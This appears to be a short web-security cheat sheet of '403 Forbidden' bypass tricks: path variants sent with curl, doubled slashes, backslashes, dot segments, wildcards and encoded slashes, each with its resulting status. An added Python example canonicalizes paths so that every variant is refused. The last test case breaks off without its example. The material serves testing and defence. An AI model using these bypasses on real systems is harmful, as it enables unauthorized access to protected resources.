403 Bypass

Test case 1: Redirect based Bypass

curl -X GET --path-as-is https://example.com/private/
curl -X GET --path-as-is https://example.com/../admin/

Test case 2: Authentication Bypass

/api//users -> 200 OK
/api\users -> 200 OK

Test case 3: Directory Based

If a directory path with no slash at the end returns 403, try these variations on it:

site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200

Test case 4: File Based

If a file path with no slash at the end returns 403, try these variations on it:

site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
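Every variant in test cases 1 to 4 works only because the component that returns the 403 (proxy, WAF, or framework rule) reads the path differently from the backend that finally serves it: one sees `/secret/./`, the other sees `/secret`. The Python below is an added example, not code from this page, showing the defensive counterpart: canonicalize the request path once (percent-decode until stable, treat `\` as `/`, collapse repeated slashes, resolve `.` and `..`, drop the trailing slash) and authorize the canonical form. The protected prefixes and the naive exact-match check it is compared against are constructed for illustration; the request paths are the ones listed above.

```python
"""Canonicalize once, then authorize: the fix for path-confusion 403 bypasses.

Constructed example. The protected prefixes and the naive check stand in for
whatever rule a real front end applies; the variant paths are the ones listed
in test cases 1 to 4 on this page.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed: resources the access-control layer is meant to guard.
PROTECTED_PREFIXES = ("/private", "/admin", "/api/users", "/secret", "/secret.txt")


def canonicalize_path(raw_path: str) -> str:
    """Reduce a request path to a single canonical form.

    Drops query/fragment, percent-decodes until stable (so %2f and %252f both
    become '/'), treats backslash as a separator, collapses repeated slashes,
    resolves '.' and '..' segments and strips the trailing slash.
    """
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):                      # bounded loop: stop once decoding is stable
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")          # '/api\\users' -> '/api/users'
    if not path.startswith("/"):
        path = "/" + path
    path = re.sub(r"/+", "/", path)         # '//' -> '/'; also removes a leading '//' that normpath keeps
    return posixpath.normpath(path)         # resolves '/./' and '/../', removes trailing '/'


def is_protected(canonical: str) -> bool:
    """True if the canonical path is a guarded resource or lies beneath one."""
    return any(canonical == p or canonical.startswith(p + "/") for p in PROTECTED_PREFIXES)


def naive_decision(raw_path: str) -> int:
    """The weak check the bypasses defeat: exact match on the raw, un-normalized path."""
    return 403 if raw_path in PROTECTED_PREFIXES else 200


def hardened_decision(raw_path: str) -> int:
    """Authorize the canonical form, so every spelling of a resource gets the same answer."""
    return 403 if is_protected(canonicalize_path(raw_path)) else 200


# Request paths from the test cases on this page (constructed host omitted).
PAGE_VARIANTS = ["/private/", "/../admin/", "/api//users", "/api\\users",
                 "/secret/*", "/secret/./", "/secret.txt/", "/%2f/secret.txt/"]


def compare(paths=PAGE_VARIANTS):
    """Return {raw_path: (canonical_path, naive_status, hardened_status)}."""
    return {p: (canonicalize_path(p), naive_decision(p), hardened_decision(p)) for p in paths}


if __name__ == "__main__":
    for raw, (canon, naive, hard) in compare().items():
        print(f"{raw:20} -> {canon:16} naive={naive} hardened={hard}")
```

Running it prints every listed variant passing the naive check with 200 and being refused with 403 once canonicalized. The same canonicalization has to be applied by every layer that makes an access decision, with the same rules the origin server uses to resolve files; a mismatch anywhere in the chain recreates the gap these test cases probe.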

Test case 5: Protocol Based

Well, it sounds weird, but check out the example for a better understanding.
